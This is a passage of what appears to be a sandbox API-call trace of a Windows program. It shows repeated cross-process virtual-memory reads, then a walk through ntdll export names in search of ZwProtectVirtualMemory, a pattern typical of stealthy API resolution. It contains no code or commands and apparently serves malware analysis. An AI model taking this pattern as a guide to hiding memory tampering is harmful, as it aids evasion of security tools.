BufferSize=0x292e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.217] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x77fff000, Buffer=0x7ff9, BufferSize=0x292f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.217] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78000000, Buffer=0x7ff9, BufferSize=0x2930000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.217] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78001000, Buffer=0x7ff9, BufferSize=0x2931000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.217] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78002000, Buffer=0x7ff9, BufferSize=0x2932000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.217] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78003000, Buffer=0x7ff9, BufferSize=0x2933000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.217] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78004000, Buffer=0x7ff9, BufferSize=0x2934000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.218] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78005000, Buffer=0x7ff9, BufferSize=0x2935000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.218] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78006000, Buffer=0x7ff9, BufferSize=0x2936000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.218] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78007000, Buffer=0x7ff9, BufferSize=0x2937000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.218] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78008000, Buffer=0x7ff9, BufferSize=0x2938000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.218] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78009000, Buffer=0x7ff9, BufferSize=0x2939000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.218] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800a000, Buffer=0x7ff9, BufferSize=0x293a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.218] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800b000, Buffer=0x7ff9, BufferSize=0x293b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.218] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800c000, Buffer=0x7ff9, BufferSize=0x293c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.218] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800d000, Buffer=0x7ff9, BufferSize=0x293d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.219] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800e000, Buffer=0x7ff9, BufferSize=0x293e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.219] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7800f000, Buffer=0x7ff9, BufferSize=0x293f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.219] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78010000, Buffer=0x7ff9, BufferSize=0x2940000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.219] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78011000, Buffer=0x7ff9, BufferSize=0x2941000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.219] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78012000, Buffer=0x7ff9, BufferSize=0x2942000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.219] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78013000, Buffer=0x7ff9, BufferSize=0x2943000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.219] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78014000, Buffer=0x7ff9, BufferSize=0x2944000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.219] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78015000, Buffer=0x7ff9, BufferSize=0x2945000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.219] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78016000, Buffer=0x7ff9, BufferSize=0x2946000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.220] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78017000, Buffer=0x7ff9, BufferSize=0x2947000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.220] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78018000, Buffer=0x7ff9, BufferSize=0x2948000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.220] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78019000, Buffer=0x7ff9, BufferSize=0x2949000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.220] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7801a000, Buffer=0x7ff9, BufferSize=0x294a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.220] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7801b000, Buffer=0x7ff9, BufferSize=0x294b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.220] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7801c000, Buffer=0x7ff9, BufferSize=0x294c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.220] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7801d000, Buffer=0x7ff9, BufferSize=0x294d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.220] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7801e000, Buffer=0x7ff9, BufferSize=0x294e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.220] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x7801f000, Buffer=0x7ff9, BufferSize=0x294f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.221] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78020000, Buffer=0x7ff9, BufferSize=0x2950000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.221] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78021000, Buffer=0x7ff9, BufferSize=0x2951000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.221] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78022000, Buffer=0x7ff9, BufferSize=0x2952000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.221] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78023000, Buffer=0x7ff9, BufferSize=0x2953000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.221] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78024000, Buffer=0x7ff9, BufferSize=0x2954000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.221] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78025000, Buffer=0x7ff9, BufferSize=0x2955000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.221] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78026000, Buffer=0x7ff9, BufferSize=0x2956000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.221] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78027000, Buffer=0x7ff9, BufferSize=0x2957000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.221] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1dc, BaseAddress=0x78028000, Buffer=0x7ff9, BufferSize=0x2958000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0207.237] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwProtectVirtualMemory") returned -1 [0207.237] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwProtectVirtualMemory") returned -1 [0207.237] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwProtectVirtualMemory") returned -1 [0207.237] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwProtectVirtualMemory") returned -1 [0207.237] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0207.237] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0207.237] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgPrint", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwProtectVirtualMemory") returned -1 [0207.238] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwProtectVirtualMemory") returned -1 [0207.239] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwProtectVirtualMemory") returned -1 [0207.240] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwProtectVirtualMemory") returned -1 [0207.241] 